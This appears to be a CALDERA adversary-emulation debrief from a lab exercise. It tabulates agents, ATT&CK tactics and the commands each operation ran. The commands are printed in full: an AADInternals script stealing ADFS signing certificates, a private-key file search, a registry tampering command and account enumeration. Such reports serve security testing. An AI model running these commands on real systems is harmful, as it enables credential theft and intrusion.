OPERATIONS DEBRIEF

Generated on 2023-04-25T13:16:32Z

This document covers the overall campaign analytics made up of the selected set of operations. The
below sections contain general metadata about the selected operations as well as graphical views of
the operations, the techniques and tactics used, and the facts discovered by the operations. The
following sections include a more in depth review of each specific operation ran.

STATISTICS
An operation's planner makes up the decision making process. It contains logic for how a running
operation should make decisions about which abilities to use and in what order. An objective is a
collection of fact targets, called goals, which can be tied to adversaries. During the course of an
operation, every time the planner is evaluated, the current objective status is evaluated in light of the
current knowledge of the operation, with the operation completing should all goals be met.

Name State Planner Objective Time

windows - discovery finished atomic default 2023-04-25T13:13:19Z

asdasdasd finished atomic default 2023-04-25T13:09:48Z

(25/4/2023, 10:08:32)

windows - discovery run_one_link atomic default Not finished

(25/4/2023, 10:13:12)

windows - discovery running atomic default Not finished

(25/4/2023, 10:14:07)

AGENTS
The table below displays information about the agents used. An agent's paw is the unique identifier, or
paw print, of an agent. Also included are the username of the user who executed the agent, the
privilege level of the agent process, and the name of the agent executable.

Paw Host Platform Username Privilege Executable

zzmkxe upa linux root Elevated red-team

hcaska ubuntu-16 linux root Elevated sandcat.go-linux

ltlyuu WIN-1RE7BLRQC2T windows WIN-1RE7BLRQC2T\Administrado User wserver2008.exe

r

mwdxiu upa linux upa User blue-agent

Page 1
OPERATIONS DEBRIEF

Paw Host Platform Username Privilege Executable

uldkmv upa linux root Elevated sandcat.go-linux

ecamvk upa linux root Elevated sandcat.go-linux

znhgow WIN-1RE7BLRQC2T windows WIN-1RE7BLRQC2T\Administrado Elevated blueSRV2008.exe

r

ATTACK PATH GRAPH

This graph displays the attack path of hosts compromised by CALDERA. Source and target hosts are
connected by the method of execution used to start the agent on the target host.
Legend

server

upa$root linux

WIN-1RE7BLRQC2T$WIN-1RE7BLRQC2T\Administrador windows
ubuntu-16$root

C2 Server
upa$upa

WIN-1RE7BLRQC2T$WIN-1RE7BLRQC2T\Administrador

upa$root
upa$root

STEPS GRAPH
This is a graphical display of the agents connected to the command and control (C2), the operations
run, and the steps of each operation as they relate to the agents.
windows - discovery

Legend

ubuntu-16$root
WIN-1RE7BLRQC2T$WIN-1RE7BLRQC2T\Administrador server

C2 Server linux

windows
upa$root
operation
windows - discovery (25/4/2023, 10:14:07)
discovery

upa$root defense-evasion
WIN-1RE7BLRQC2T$WIN-1RE7BLRQC2T\Administrador
credential-access
upa$upa
upa$root
execution
windows - discovery (25/4/2023, 10:13:12) asdasdasd (25/4/2023, 10:08:32)

Page 2
OPERATIONS DEBRIEF

TACTIC GRAPH
This graph displays the order of tactics executed by the operation. A tactic explains the general
purpose or the "why" of a step.
windows - discovery (25/4/2023, 10:14:07)

Legend

operation

asdasdasd (25/4/2023, 10:08:32) discovery

defense-evasion
discovery
credential-access
credential-access
execution
windows - discovery
discovery

defense-evasion defense-evasion
windows - discovery (25/4/2023, 10:13:12)
execution

credential-access

TECHNIQUE GRAPH
This graph displays the order of techniques executed by the operation. A technique explains the
technical method or the "how" of a step.
Modify Registry

windows - discovery (25/4/2023, 10:13:12) Legend

operation

technique_name
Account Discovery: Local Account

System Owner/User Discovery

Unsecured Credentials: Private Keys

windows - discovery
Unsecured Credentials: Private Keys
Account Discovery: Domain Account
asdasdasd (25/4/2023, 10:08:32)
Virtualization/Sandbox Evasion: Time Based Evasion

Command and Scripting Interpreter: PowerShell

windows - discovery (25/4/2023, 10:14:07)

Page 3
OPERATIONS DEBRIEF

FACT GRAPH
This graph displays the facts discovered by the operations run. Facts are attached to the operation
where they were discovered. Facts are also attached to the facts that led to their discovery. For
readability, only the first 15 facts discovered in an operation are included in the graph.
host.user.name
file.sensitive.extension
Legend

operation
host.user.name
server.malicious.url host.user.name
fact

host.user.name
12 file.sensitive.extension
4 server.malicious.url
51 host.user.name
1 domain.user.name
file.sensitive.extension
server.malicious.url asdasdasd (25/4/2023, 10:08:32)

host.user.name
file.sensitive.extension host.user.name
file.sensitive.extension
windows - discovery (25/4/2023, 10:14:07)

file.sensitive.extension domain.user.name

windows - discovery (25/4/2023, 10:13:12) host.user.name

file.sensitive.extension

host.user.name

file.sensitive.extension server.malicious.url
file.sensitive.extension
host.user.name
file.sensitive.extension

host.user.name

file.sensitive.extension

file.sensitive.extension
windows - discovery

server.malicious.url

file.sensitive.extension

TACTICS AND TECHNIQUES

Tactics Techniques Abilities
Credential-access T1552.004: Unsecured Credentials: Private Keys windows - discovery
ADFS token signing and encryption
certificates theft - Remote
Private Keys

Defense-evasion T1497.003: Virtualization/Sandbox Evasion: Time Based windows - discovery

Evasion 1-min sleep
T1112: Modify Registry windows - discovery (25/4/2023,
10:13:12)
Activate Windows NoFileMenu
Group Policy Feature

Discovery T1087.002: Account Discovery: Domain Account windows - discovery

T1033: System Owner/User Discovery Account Discovery (targeted)
T1087.001: Account Discovery: Local Account asdasdasd (25/4/2023, 10:08:32)
Identify active user
Find local users

Execution T1059.001: Command and Scripting Interpreter: PowerShell windows - discovery

ATHPowerShellCommandLinePar
ameter -Command parameter
variations

Page 4
OPERATIONS DEBRIEF

STEPS IN OPERATION WINDOWS - DISCOVERY

The table below shows detailed information about the steps taken in an operation and whether the
command run discovered any facts.

Time Status Agent Name Command Facts

collecte ltlyuu 1-min sleep sleep 60 No
d

collecte ltlyuu ADFS token Import-Module ActiveDirectory -Force ; Import-Module No

d signing and AADInternals -Force | Out-Null; $dcServerName =
encryption (Get-ADDomainController).HostName; $svc =
certificates Get-ADObject -filter * -Properties objectguid,objectsid |
theft - Where-Object name -eq
Remote "#{adfs_service_account_name}"; $PWord =
ConvertTo-SecureString -String
"#{replication_password}" -AsPlainText -Force;
$Credential = New-Object -TypeName
System.Management.Automation.PSCredential
-ArgumentList; $hash = Get-AADIntADUserNTHash
-ObjectGuid $svc.ObjectGuid -Credentials $Credential
-Server $dcServerName -AsHex; $ADFSConfig =
Export-AADIntADFSConfiguration -Hash $hash -SID
$svc.Objectsid.Value -Server; $Configuration =
[xml]$ADFSConfig; $group = $Configuration.ServiceSetti
ngsData.PolicyStore.DkmSettings.Group; $container = $
Configuration.ServiceSettingsData.PolicyStore.DkmSetti
ngs.ContainerName; $parent = $Configuration.ServiceSe
ttingsData.PolicyStore.DkmSettings.ParentContainerDn;
$base = "LDAP://CN=$group,$container,$parent";
$ADSearch = [System.DirectoryServices.DirectorySearch
er]::new([System.DirectoryServices.DirectoryEntry]::new(
$base)); $ADSearch.Filter = '(name=CryptoPolicy)';
$ADSearch.PropertiesToLoad.Clear();
$ADSearch.PropertiesToLoad.Add("displayName") |
Out-Null; $aduser = $ADSearch.FindOne();
$keyObjectGuid = $ADUser.Properties["displayName"] ;
$ADSearch.PropertiesToLoad.Clear();
$ADSearch.PropertiesToLoad.Add("thumbnailphoto") |
Out-Null; $ADSearch.Filter="(l=$keyObjectGuid)";
$aduser=$ADSearch.FindOne() ;
$key=[byte[]]$aduser.Properties["thumbnailphoto"][0] ;
Export-AADIntADFSCertificates -Configuration
$ADFSConfig -Key $key; Get-ChildItem | Where-Object
{$_ -like "ADFS*"}; Write-Host "`nCertificates retrieved
successfully"

collecte ltlyuu Account net user #{domain.user.name} /domain No

d Discovery
(targeted)

Page 5
OPERATIONS DEBRIEF

Time Status Agent Name Command Facts

collecte ltlyuu ATHPowerSh $RequiredModule = Get-Module -Name No
d ellCommand AtomicTestHarnesses -ListAvailable; if (-not
LineParamet $RequiredModule) {Install-Module -Name
er -Command AtomicTestHarnesses -Scope CurrentUser -Force}; ;
parameter Out-ATHPowerShellCommandLineParameter
variations -CommandLineSwitchType Hyphen
-CommandParamVariation C -Execute -ErrorAction Stop

collecte ltlyuu Private Keys dir c:\ /b /s .key | findstr /e .key No

d

STEPS IN OPERATION ASDASDASD (25/4/2023,

10:08:32)
The table below shows detailed information about the steps taken in an operation and whether the
command run discovered any facts.

Time Status Agent Name Command Facts

2023-04-25 success uldkmv Identify active whoami Yes
T13:08:48Z user

2023-04-25 success ecamvk Identify active whoami Yes

T13:08:39Z user

2023-04-25 success uldkmv Find local cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#' Yes
T13:09:44Z users

2023-04-25 success ecamvk Find local cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#' Yes
T13:09:40Z users

STEPS IN OPERATION WINDOWS - DISCOVERY

(25/4/2023, 10:13:12)
The table below shows detailed information about the steps taken in an operation and whether the
command run discovered any facts.

Time Status Agent Name Command Facts

collecte ltlyuu Activate reg add "HKEY_CURRENT_USER\Software\Microsoft\W No
d Windows indows\CurrentVersion\Policies\Explorer" /v NoFileMenu
NoFileMenu /t REG_DWORD /d 1 /f
Group Policy
Feature

Page 6
OPERATIONS DEBRIEF

STEPS IN OPERATION WINDOWS - DISCOVERY

(25/4/2023, 10:14:07)
The table below shows detailed information about the steps taken in an operation and whether the
command run discovered any facts.

Time Status Agent Name Command Facts

FACTS FOUND IN OPERATION WINDOWS - DISCOVERY

The table below displays the facts found in the operation, the command run and the agent that found
the fact. Every fact, by default, gets a score of 1. If a host.user.password fact is important or has a high
chance of success if used, you may assign it a score of 5. When an ability uses a fact to fill in a
variable, it will use those with the highest scores first. A fact with a score of 0, is blacklisted - meaning it
cannot be used in an operation.

Trait Value Score Source Command Run

file.sensitive.ext wav 1 ed3..96b No Command (SEEDED)
ension

file.sensitive.ext yml 1 ed3..96b No Command (SEEDED)

ension

file.sensitive.ext png 1 ed3..96b No Command (SEEDED)

ension

server.malicious keyloggedsite.com 1 ed3..96b No Command (SEEDED)

.url

FACTS FOUND IN OPERATION ASDASDASD (25/4/2023,

10:08:32)
The table below displays the facts found in the operation, the command run and the agent that found
the fact. Every fact, by default, gets a score of 1. If a host.user.password fact is important or has a high
chance of success if used, you may assign it a score of 5. When an ability uses a fact to fill in a
variable, it will use those with the highest scores first. A fact with a score of 0, is blacklisted - meaning it
cannot be used in an operation.

Trait Value Score Source Command Run

file.sensitive.ext wav 1 ed3..96b No Command (SEEDED)
ension

file.sensitive.ext yml 1 ed3..96b No Command (SEEDED)

ension

file.sensitive.ext png 1 ed3..96b No Command (SEEDED)

ension

Page 7
OPERATIONS DEBRIEF

Trait Value Score Source Command Run

server.malicious keyloggedsite.com 1 ed3..96b No Command (SEEDED)
.url

host.user.name root 1 ecamvk, whoami

uldkmv cut -d: -f1 /etc/passwd | grep -v '_' |
grep -v '#'

domain.user.na root 1 ecamvk, whoami

me uldkmv

host.user.name daemon 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name bin 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name sys 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name sync 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name games 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name man 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name lp 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name mail 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name news 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name uucp 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name proxy 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name www-data 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name backup 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name list 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name irc 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name gnats 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

Page 8
OPERATIONS DEBRIEF

Trait Value Score Source Command Run

host.user.name nobody 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |
uldkmv grep -v '#'

host.user.name systemd-network 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name systemd-resolve 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name systemd-timesync 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name messagebus 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name syslog 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name tss 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name uuidd 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name tcpdump 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name landscape 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name pollinate 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name usbmux 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name sshd 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name systemd-coredump 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name upa 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name lxd 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name fwupd-refresh 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name rtkit 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name kernoops 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

Page 9
OPERATIONS DEBRIEF

Trait Value Score Source Command Run

host.user.name lightdm 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |
uldkmv grep -v '#'

host.user.name whoopsie 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name dnsmasq 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name avahi-autoipd 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name avahi 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name cups-pk-helper 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name nm-openvpn 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name pulse 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name speech-dispatcher 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name geoclue 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name saned 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name hplip 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name colord 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name gnome-initial-setup 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

host.user.name gdm 1 ecamvk, cut -d: -f1 /etc/passwd | grep -v '_' |

uldkmv grep -v '#'

FACTS FOUND IN OPERATION WINDOWS - DISCOVERY

(25/4/2023, 10:13:12)
The table below displays the facts found in the operation, the command run and the agent that found
the fact. Every fact, by default, gets a score of 1. If a host.user.password fact is important or has a high
chance of success if used, you may assign it a score of 5. When an ability uses a fact to fill in a
variable, it will use those with the highest scores first. A fact with a score of 0, is blacklisted - meaning it
cannot be used in an operation.

Page 10
OPERATIONS DEBRIEF

Trait Value Score Source Command Run

file.sensitive.ext wav 1 ed3..96b No Command (SEEDED)
ension

file.sensitive.ext yml 1 ed3..96b No Command (SEEDED)

ension

file.sensitive.ext png 1 ed3..96b No Command (SEEDED)

ension

server.malicious keyloggedsite.com 1 ed3..96b No Command (SEEDED)

.url

FACTS FOUND IN OPERATION WINDOWS - DISCOVERY

(25/4/2023, 10:14:07)
The table below displays the facts found in the operation, the command run and the agent that found
the fact. Every fact, by default, gets a score of 1. If a host.user.password fact is important or has a high
chance of success if used, you may assign it a score of 5. When an ability uses a fact to fill in a
variable, it will use those with the highest scores first. A fact with a score of 0, is blacklisted - meaning it
cannot be used in an operation.

Trait Value Score Source Command Run

file.sensitive.ext wav 1 ed3..96b No Command (SEEDED)
ension

file.sensitive.ext yml 1 ed3..96b No Command (SEEDED)

ension

file.sensitive.ext png 1 ed3..96b No Command (SEEDED)

ension

server.malicious keyloggedsite.com 1 ed3..96b No Command (SEEDED)

.url

Page 11